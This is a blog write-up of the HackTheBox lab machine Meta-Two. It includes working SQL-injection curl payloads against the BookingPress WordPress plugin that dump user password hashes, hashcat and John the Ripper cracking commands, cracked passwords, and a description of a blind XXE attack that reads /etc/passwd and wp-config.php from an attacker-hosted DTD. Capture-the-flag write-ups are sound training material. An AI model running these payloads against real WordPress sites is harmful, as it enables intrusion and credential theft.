HackTheBox Meta-Two

ARZ101
6 min readApr 29

--

Meta-Two from HackTheBox was an easy rated linux machine that involved an un-authenticated SQL Injection in a plugin allowing us to login wordpress dashboard, further it had another plugin vulnerable to XXE allowing us to read wp-config.php, giving access to FTP, from there finding the credentials for jnelson and getting a foothold, reading the PGP message through the private key gave us the password which worked on the root user.

NMAP

Nmap scan report for metapress.htb (10.10.11.186)                                                                                                                                                                        
Host is up (0.13s latency).
Not shown: 947 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 c4:b4:46:17:d2:10:2d:8f:ec:1d:c9:27:fe:cd:79:ee (RSA)
| 256 2a:ea:2f:cb:23:e8:c5:29:40:9c:ab:86:6d:cd:44:11 (ECDSA)
|_ 256 fd:78:c0:b0:e2:20:16:fa:05:0d:eb:d8:3f:12:a4:ab (ED25519)
80/tcp open http nginx 1.18.0
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-generator: WordPress 5.6.2
|_http-title: MetaPress – Official company site
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-trane-info: Problem with XML parsing of /evox/about
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.18.0

PORT 80

Visting the webserver, it redirects to metapress.htb

Adding the domain name in /etc/hosts file

From wappalyzer, it seems that it’s using wordpress version 5.6.2

So running wpscan against the url

wpscan --url http://metapress.htb/

It only returned the version which we already knew but didn't found any plugins, searching for CVEs related to wordpress, it shows sql injection via WP_QUERY in wordpress version till 5.8.2 which means this version might be vulnerable as well but it didn't worked

There was another CVE specifically for this version but it was an authenticated XXE so probably we’ll need to login

Enumerating site by going to /events and viewing the source, will show a plugin named booking press being used, not sure why wpscan didn’t find it

This plugin has an un-authenticated sql injection

We just only need the nonce which we can get the from view source

curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=ef5a981727&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'

But we don’t have to worry about getting column names as it’s wordpress so we can google for columns for wp_users table

curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=0fa9f4afbd&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login,user_pass),@@version_comment,@@version_compile_os,1,2,3,4,5,6 from wp_users-- -'

Cracking the hashes with hashcat, we'll get manager's password partylikearockstar

hashcat -a 0 -m 400 ./hash.txt /usr/share/wordlists/rockyou.txt --force

And now we can login on wordpress with manager user

Foothold

Looking back at the authenticated XXE, we can try that

We need to generate a malicious wav file which will perform an out of band or blind XXE attack by fetching the dtd from our server which is going to read the /etc/passwd file and present the output to us

Before running the script, make sure install wavefile npm package with npm -i wavefile

Simply upload the malicious.wav file through Media Library option and check the listener

Decoding the base64 file contents we’ll get /etc/password from the target machine

Now reading wp-config.php which should one directory back

With these credentials we can login to ftp

By going into mailer directoy, there's send_mail.php from where we can find jnelson's password and login through ssh

Privilege Escalation

Checking the files which are owned by jnelson group, we see few files related to passpie which is a command line manager

Here we’ll see the pgp message that is encrypted

We’ll also find the pgp private key from /home/.passpie/keys

To crack the pgp message we need to know the password of the private key so that we can import it and do that we can use gpg2john

/usr/sbin/gpg2john ./private.key >  private_hash
john --wordlist=/usr/share/wordlists/rockyou.txt private_hash

With the password blink182 we can import the private key

We can export passwords from passpie as well with export option by specifying the private key password and the path where we want to save the file

References

--

--

ARZ101

Smol Pentester| OSCP | CTF Player | UwU